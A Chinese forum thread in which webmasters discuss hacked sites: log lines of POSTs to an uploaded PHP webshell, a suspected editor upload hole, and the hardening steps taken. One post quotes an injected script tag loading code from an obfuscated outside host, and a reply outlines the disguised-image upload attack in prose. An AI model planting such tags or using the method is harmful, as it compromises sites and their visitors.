主要应该看POST吧 没分析过日志~

04:32:36 POST /images/gifimg.php 65.182.191.191 200 175 2001

sql注入代码应该添加了吧
还有就是互动部分,比如留言,提交图片之类,有没有过滤掉特殊字符

sql注入代码还是sql防注入代码

sql防注入加了。。问题是连inc.asp（防注入代码）也被写和了这个代码了。。

在QQ群里请教了。。hmhz版（多谢）。。暂时防了。。

关闭了FSO功能。。
关闭了空间PHP空间的支持（我被上传的是PHP木马）
删除了网站后台功能。。只保留前台能浏览的程序文件。。
甚至。。关闭了FTP空间。。。不能上传了。。知道密码也不行。。
切断了这些可利用资源了。。但愿明天不会有问题了。呵呵。。

谢谢各们位。。

你厉害。。我看了好久。。眼睛都快看得掉出来了。。都没看到这个。。

04:32:36 POST /images/gifimg.php 65.182.191.191 200 175 2001
04:32:36 POST /html/anli.php 65.182.191.191 200 160 212

当时也忘了查找。。

就是这个日志了。。呵呵。。

但是即使找到了它。。我还是不太清楚漏洞在哪里？我想应该是eWebEditor这个html在线编辑器的上传漏洞了。。。

有可能是服务商那边的服务器里有个电脑中了病之后，在那里传播。
我公司页面卡的很严重查看页面代码时发现了这个。电话甩到机房里。那边查到是其它机子中标的问题。

是呀   我也遇到相似的问题   烦死了     
是在页面代码的最后加的    <script src=http://%75%72%62%61n%68%75b%2E%63%6E></script>
每次加上的形式是一样的      但里面的数字有所变动   

大哥哥  大姐姐   好妹妹们    帮帮忙吧

这个问题一般是你程序的漏洞造成的，而且一般都是上传漏洞，利用上传漏洞上传一个伪装的图片文件，其实是个木马文件，上传成功后，将该图片文件恢复为asp文件，这个文件一般就是黑你的人的登陆入口，利用这个文件可以访问到你整站上的所有文件列表，从而可以很方便的实现批量挂马等功能，现在的问题是，你得先找到这个文件，然后把你文件上传的漏洞堵上